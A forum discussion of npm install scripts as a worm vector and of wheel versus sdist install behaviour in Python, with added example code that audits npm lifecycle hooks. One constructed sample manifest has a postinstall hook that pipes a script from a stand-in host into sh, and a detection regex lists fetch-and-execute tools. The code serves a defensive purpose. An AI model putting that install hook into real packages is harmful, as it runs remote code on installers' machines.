Comment by Balinares 5 days ago

As far as I understand, NPM packages are not self-contained like e.g. Python wheels and can (and often need to) run scripts on install.

So just installing a package can get you compromised. If the compromised box contains credentials to update your own packages in NPM, then it's an easy vector for a worm to propagate.
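As an added illustration of the install-script point in the comment above (example code written for this page, not part of the original comment and not npm's own tooling): a small Python audit that lists the lifecycle hooks npm runs automatically when a package is installed as a dependency and flags commands that fetch or pipe in remote code. The two manifests and the SUSPICIOUS pattern list are constructed for the example; the `ignore_scripts` and `has_binding_gyp` parameters are names chosen here to model npm's `--ignore-scripts` option and its documented fallback of running `node-gyp rebuild` for packages that ship a binding.gyp without an install script.

```python
import json
import re

# Lifecycle hooks npm runs automatically when a package is installed as a
# dependency, in the order they fire. ("prepare" also runs for git
# dependencies, but is left out here to keep the model simple.)
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic patterns for commands that fetch or execute remote or obfuscated
# code. Constructed for this example; not an exhaustive or official list.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|node\s+-e|eval\(|base64|"
    r"\|\s*(sh|bash)\b|child_process)",
    re.IGNORECASE,
)


def install_time_scripts(package_json: str, has_binding_gyp: bool = False,
                         ignore_scripts: bool = False) -> dict:
    """Return {hook: command} for each script npm would run on install.

    has_binding_gyp models npm's documented default: a package that ships
    binding.gyp but defines neither "install" nor "preinstall" gets an
    implicit `node-gyp rebuild` install script, so a native add-on executes
    build code even with an empty "scripts" section.
    ignore_scripts models `npm install --ignore-scripts` (or
    `ignore-scripts=true` in .npmrc), which suppresses every lifecycle hook.
    """
    if ignore_scripts:
        return {}
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    hooks = {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}
    if has_binding_gyp and "install" not in hooks and "preinstall" not in hooks:
        hooks["install"] = "node-gyp rebuild"  # implicit, not in package.json
    return hooks


def flag_suspicious(hooks: dict) -> list:
    """Names of hooks whose command matches the SUSPICIOUS heuristic."""
    return sorted(hook for hook, cmd in hooks.items() if SUSPICIOUS.search(cmd))


# Constructed sample manifests (not real packages).
BENIGN = json.dumps({
    "name": "pad-left-demo", "version": "1.0.0",
    "scripts": {"test": "node test.js"},   # only runs when explicitly asked
})
WORMY = json.dumps({
    "name": "totally-fine-demo", "version": "2.3.1",
    "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"},
})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN), ("wormy", WORMY)):
        hooks = install_time_scripts(manifest)
        print(label, hooks, "suspicious:", flag_suspicious(hooks))
    print("with --ignore-scripts:", install_time_scripts(WORMY, ignore_scripts=True))
```

The practical takeaway is the last line: `ignore-scripts=true` in .npmrc (or `--ignore-scripts` on the command line) stops every hook, at the cost of breaking packages that genuinely need a native build, so those have to be allow-listed and run deliberately.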

magnetometer 5 days ago

Python wheels don't run arbitrary code on install, but source distributions do. And you can upload both to PyPI. So you would have to run

pip install <package> --only-binary :all:

to only install wheels and fail otherwise.
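To make the wheel-versus-sdist distinction in the comment above concrete, here is an added Python example (written for this page, not the commenter's code and not pip's own implementation). It builds a constructed wheel and a constructed sdist for a fake `demo` package, reports which one carries a build step that executes on the installing machine, and models pip's candidate choice with and without `--only-binary :all:`. The function names `classify_distribution`, `pick_install_candidate` and `build_samples` are chosen here; the candidate selection is a deliberate simplification that ignores pip's Python-version and platform tag matching.

```python
import io
import os
import tarfile
import tempfile
import zipfile

# Files in an sdist root that pip hands to the build step, where code runs.
BUILD_TIME_CODE = ("setup.py", "pyproject.toml")


def classify_distribution(path: str) -> dict:
    """Say whether a distribution file is a wheel or an sdist and which files
    feed the build step.

    A wheel is a zip archive that pip only unpacks into site-packages, so
    nothing from the package executes during installation. An sdist has to be
    built first: pip runs setup.py (or the build backend named in
    pyproject.toml, which may be shipped inside the sdist itself), so any code
    there runs on the installing machine.
    """
    name = os.path.basename(path)
    if name.endswith(".whl"):
        with zipfile.ZipFile(path) as zf:
            members = zf.namelist()
        return {"kind": "wheel", "runs_code_on_install": False,
                "build_files": [], "members": members}
    if name.endswith(".tar.gz"):
        with tarfile.open(path, "r:gz") as tf:
            members = tf.getnames()
        build_files = sorted(
            m for m in members
            if m.count("/") == 1 and m.split("/")[1] in BUILD_TIME_CODE
        )
        return {"kind": "sdist", "runs_code_on_install": True,
                "build_files": build_files, "members": members}
    raise ValueError(f"not a wheel or sdist: {name}")


def pick_install_candidate(filenames, only_binary: bool = False):
    """Simplified model of pip's choice between the files an index offers.

    pip prefers a compatible wheel; without one it builds the sdist, unless
    --only-binary :all: was given, in which case the install fails instead.
    (Real pip also filters wheels by Python version and platform tags; that
    matching is omitted here.)
    """
    wheels = [f for f in filenames if f.endswith(".whl")]
    sdists = [f for f in filenames if f.endswith(".tar.gz")]
    if wheels:
        return wheels[0]
    if sdists and not only_binary:
        return sdists[0]
    return None


def build_samples(directory=None) -> tuple:
    """Write a constructed wheel and sdist for the same fake 'demo' package
    and return their paths. Neither is a real PyPI artifact."""
    directory = directory or tempfile.mkdtemp(prefix="dist-demo-")
    wheel = os.path.join(directory, "demo-1.0-py3-none-any.whl")
    with zipfile.ZipFile(wheel, "w") as zf:
        zf.writestr("demo/__init__.py", "VERSION = '1.0'\n")
        zf.writestr("demo-1.0.dist-info/METADATA",
                    "Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n")
        zf.writestr("demo-1.0.dist-info/WHEEL",
                    "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n")
    sdist = os.path.join(directory, "demo-1.0.tar.gz")
    files = {
        "demo-1.0/PKG-INFO": "Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n",
        "demo-1.0/demo/__init__.py": "VERSION = '1.0'\n",
        # Everything in this file executes on the installing machine during
        # the build step; a malicious sdist would put its payload here.
        "demo-1.0/setup.py": (
            "from setuptools import setup\n"
            "print('this line runs during pip install of the sdist')\n"
            "setup(name='demo', version='1.0', packages=['demo'])\n"
        ),
    }
    with tarfile.open(sdist, "w:gz") as tf:
        for member, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(member)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return wheel, sdist


if __name__ == "__main__":
    wheel, sdist = build_samples()
    for path in (wheel, sdist):
        print(os.path.basename(path), classify_distribution(path))
    offered = [os.path.basename(sdist)]  # an index that only has an sdist
    print("default pip picks:", pick_install_candidate(offered))
    print("--only-binary :all: picks:", pick_install_candidate(offered, only_binary=True))
```

The same restriction can be made permanent with `only-binary = :all:` under `[install]` in pip.conf, or `PIP_ONLY_BINARY=:all:` in the environment, so that a CI job fails loudly when a dependency suddenly ships only as an sdist rather than quietly building it.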

  • Balinares 2 days ago

    Fair point -- I was only thinking of wheels, but you are right.

    Would source distributions work as a vector for automated propagation, though? If I'm not mistaken, there's no universal standard for building from source distributions.